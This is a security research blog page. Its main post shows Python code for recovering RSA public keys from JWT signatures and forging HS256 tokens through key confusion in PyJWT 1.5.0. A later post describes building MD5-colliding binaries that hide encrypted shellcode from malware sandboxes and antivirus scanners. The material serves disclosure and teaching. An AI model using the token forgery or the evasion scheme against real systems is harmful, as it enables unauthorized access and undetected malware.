Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those brave souls who dare to roll their own crypto.

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL APIs didn’t trigger, while those placed in the depths of the library did, we realized that the developers had implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but it also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without them we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just compute the greatest common divisor (GCD) of values derived from the available message-signature pairs (for each pair, the signature raised to the public exponent, minus the message). Without going into the details of why this works (a more complete explanation is here), there are a few things worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms for computing the GCD have existed since ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At the time we had a quick and dirty implementation based on the gmpy2 library, which allowed us to work with large integers and modern, efficient algorithms from Python.
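
To illustrate the idea, here is a minimal sketch of the recovery step, assuming textbook RSA (the signature is the message, taken as an integer, raised to the private exponent mod n) and a guessed public exponent of 65537; the function and variable names are illustrative, not taken from our original tool:

    import gmpy2

    def candidate_moduli(m1, s1, m2, s2, e=65537):
        # n divides s^e - m for every valid pair, so the GCD of two such
        # values is n multiplied by a (usually small) cofactor
        k = gmpy2.gcd(gmpy2.mpz(s1) ** e - m1, gmpy2.mpz(s2) ** e - m2)
        # divide out small cofactors to get the candidate moduli
        return [k // d for d in range(1, 100) if k % d == 0]

With real pairs, the correct modulus is usually the candidate with the expected bit length (e.g. 2048 bits), and it can be confirmed with a third message-signature pair.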

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation before it struck me: the dirty little code we wrote for that custom RSA application could be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well known in security circles (unfortunately these concerns can’t seem to find their way to users), and alg=”none” fiascos regularly deliver facepalms. This time we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is that the symmetric verification process assumes the same key was used to generate the MAC, so the RSA public key effectively becomes the HMAC secret: if the attacker has the RSA public key, she can forge the signature too.
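
The forgery itself needs nothing beyond the Python standard library. Here is a hedged sketch of the key confusion step, assuming the attacker already holds the PEM-encoded RSA public key as a byte string (the names are illustrative):

    import base64, hashlib, hmac, json

    def b64url(data):
        # JWT uses unpadded Base64URL encoding
        return base64.urlsafe_b64encode(data).rstrip(b"=")

    def forge_token(payload, public_pem):
        header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
        body = b64url(json.dumps(payload).encode())
        signing_input = header + b"." + body
        # the verifier feeds its RSA public key into the HMAC check,
        # so the very same bytes are used as the HMAC secret here
        sig = hmac.new(public_pem, signing_input, hashlib.sha256).digest()
        return signing_input + b"." + b64url(sig)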

In practice however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability in PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to reject key parameters that “look like” asymmetric keys when symmetric algorithms are used, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust the key filtering is now; deprecating the verification API without an explicit algorithm specification is certainly the way to go.)
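
For context, the vulnerable verification pattern looks roughly like the sketch below: the server loads its RSA public key and calls decode() without pinning the algorithm, so a token forged as shown above verifies successfully (PyJWT 1.5.0 assumed; the file and variable names are illustrative):

    import jwt  # PyJWT 1.5.0 assumed

    public_pem = open("rsa_pub.pem", "rb").read()

    def verify(token):
        # vulnerable: the algorithm is taken from the attacker-controlled
        # header instead of being fixed to ["RS256"]
        return jwt.decode(token, public_pem)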

Based on the documentation, RSA keys are provided to the encode/decode APIs (which also do the signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array based on message-signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JWS’s integer representations matches gmpy2’s.
  • Message canonicalization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of tokens; no canonicalization of delimiters, whitespace or special characters is necessary.
  • Message padding: JWS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low-level crypto APIs (this took me a while, until I found this CTF writeup) will provide us with standards-compliant output, without having to mess with ASN.1 (a minimal sketch of the padding step follows below).
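
Since the padding is deterministic, the padded message representative can be reproduced exactly. Here is a hedged sketch of the EMSA-PKCS1-v1_5 encoding for a 2048-bit key, following RFC 8017 (the function name and the key length parameter are my own):

    import hashlib

    # DER-encoded DigestInfo prefix for SHA-256, a fixed constant from RFC 8017
    SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

    def emsa_pkcs1_v15(signing_input, key_len_bytes=256):
        t = SHA256_PREFIX + hashlib.sha256(signing_input).digest()
        ps = b"\xff" * (key_len_bytes - len(t) - 3)
        return int.from_bytes(b"\x00\x01" + ps + b"\x00" + t, "big")

For RS256 tokens this padded integer plays the role of the message in the GCD computation described earlier.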

No problem here: with some modifications to our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allow little room for changes, so there is a high chance that if we generate a standards-compliant PEM file it will match the one at the target. In the case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key, which can block exploitation.

After a lot of cursing over the bugs and insufficient documentation of the pyasn1 and asn1 packages, asn1tools finally proved usable for creating custom DER (and thus PEM) structures. The generated output matched the original public key perfectly, so I could successfully demonstrate token forgery without any preliminary information about the asymmetric keys.
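
For reference, a hedged sketch of the serialization step with asn1tools, wrapping a recovered (n, e) pair into a PKCS #1 “BEGIN RSA PUBLIC KEY” PEM blob (the ASN.1 definition follows RFC 8017; the exact code differs from our tool):

    import base64
    import asn1tools

    RSA_PUBLIC_KEY_ASN1 = """
    PKCS1 DEFINITIONS ::= BEGIN
        RSAPublicKey ::= SEQUENCE {
            modulus         INTEGER,
            publicExponent  INTEGER
        }
    END
    """

    def to_pkcs1_pem(n, e):
        spec = asn1tools.compile_string(RSA_PUBLIC_KEY_ASN1, "der")
        der = spec.encode("RSAPublicKey", {"modulus": n, "publicExponent": e})
        b64 = base64.b64encode(der)
        lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
        return (b"-----BEGIN RSA PUBLIC KEY-----\n" +
                b"\n".join(lines) +
                b"\n-----END RSA PUBLIC KEY-----\n")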

We tested with the 2048-bit keys prescribed by the JWS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and it produced two candidate keys, which could be easily tested.
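
Testing a candidate is straightforward: a candidate n is correct if the textbook verification equation holds for a known pair, i.e. s^e mod n equals the padded digest of the signing input. A minimal sketch, reusing emsa_pkcs1_v15() from the earlier sketch and again guessing e = 65537:

    def check_candidate(n, signing_input, s, e=65537):
        # for the right modulus, s^e mod n equals the PKCS #1 v1.5 padded digest
        return pow(s, e, n) == emsa_pkcs1_v15(signing_input, (n.bit_length() + 7) // 8)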

As usual, all code is available on GitHub. If you need help integrating this technique into your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard is figuring out all those implementation details that make pen-and-paper formulas work on actual computers. It won’t be a huge surprise to anyone who has worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting between byte arrays and strings in Python 3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements into public key representations can definitely break the process. But no one would base their security on their favorite indentation style, would they?


The curious case of encrypted URL parameters

Author: dnet

As intra-app URLs used in web applications are generated and parsed by the same code base, there’s no external force pushing developers towards using a human-readable form of serialization. Sure, a readable form makes debugging and development easier, but that’s why I used the word “external”. Many frameworks use custom encodings, but one of the most extreme things a developer can do in this regard is completely encrypting request parameters. We encountered such a setup during a recent web app security assessment; let’s see how it worked out.



Poisonous MD5 – Wolves Among the Sheep

Author: b

MD5 has been known to be broken for more than a decade now. Practical attacks have been shown since 2006, and public collision generator tools have also been available since that time. The dangers of the developed collision attacks have been demonstrated by academia and white-hat hackers, but in the case of the Flame malware we’ve also seen malicious parties exploiting the weaknesses in the wild.

And while most have already moved away from MD5, there is still a notable group that heavily uses this obsolete algorithm: security vendors. It seems that MD5 has become the de facto standard for fingerprinting malware samples, and the industry doesn’t seem willing to move away from this practice. Our friend Zoltán Balázs collected a surprisingly long list of security vendors using MD5, including the biggest names in the field.

The list includes, for example, Kaspersky, the discoverer of Flame, who just recently reminded us that MD5 is dead, but only a few weeks earlier released a report including MD5 fingerprints only – ironically, even the malware they analysed uses SHA-1 internally…

And in case you think that MD5 is “good enough” for malware identification, let’s take another example. The following picture shows the management console of a FireEye MAS – take a good look at the MD5 hashes, the time delays and the status indicators:

[Screenshot: FireEye MAS management console showing two submissions with identical MD5 sums]

Download sample files

As you can see, binaries submitted for analysis are identified by their MD5 sums, and no sandboxed execution is recorded if there is a duplicate (hence the shorter time delay). This means that if I can create two files with the same MD5 sum – one that behaves in a malicious way while the other doesn’t – I can “poison” the database of the product so that it won’t even try to analyze the malicious sample!

After reading Nat McHugh’s post about creating colliding binaries, I decided to create a proof of concept for this “attack”. Although Nat demonstrated the issue with ELF binaries, the concept is basically the same for the Windows (PE) binaries that security products mostly target. The original example works by diverting the program’s execution flow based on the comparison of two string constants. The collision is achieved by adjusting these constants so that they match in one case, but not in the other.

My goal was to create two binaries with the same MD5 hash: one that executes arbitrary shellcode (the wolf) and another that does something completely different (the sheep). My implementation is based on the earlier work of Peter Selinger (the PHP script by Nat turned out to be unreliable across platforms…), with some useful additions:

  • A general template for shellcode hiding and execution;
  • RC4 encryption of the shellcode so that the real payload only appears in the memory of the wolf but not on the disk or in the memory of the sheep;
  • Simplified toolchain for Windows, making use of Marc Stevens’ fastcoll (Peter used a much slower attack; fastcoll reduces collision generation from hours to minutes).
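
A quick way to sanity-check a generated pair is to confirm that the two binaries share an MD5 sum while their content (and thus any stronger hash) differs. A minimal sketch, with illustrative file names:

    import hashlib

    def digests(path):
        data = open(path, "rb").read()
        return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()

    md5_wolf, sha256_wolf = digests("wolf.exe")
    md5_sheep, sha256_sheep = digests("sheep.exe")

    assert md5_wolf == md5_sheep, "MD5 sums differ, the collision failed"
    assert sha256_wolf != sha256_sheep, "the files are identical, nothing is hidden"
    print("MD5 collision confirmed:", md5_wolf)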

The approach may work with traditional AV software too, as many of these also use fingerprinting (not necessarily MD5) to avoid wasting resources on scanning the same files over and over (although the RC4 encryption results in a 0/57 score on VirusTotal anyway…). It would also be interesting to see if “threat intelligence” feeds or reputation databases can be poisoned this way.

The code is available on GitHub. Please use it to test the security solutions in your reach and persuade vendors to implement up-to-date algorithms before compiling their next marketing APT report!

For the affected vendors: Stop using MD5 now! Even if you need MD5 as a common denominator, include stronger hashes in your reports, and don’t rely solely on MD5 for fingerprinting!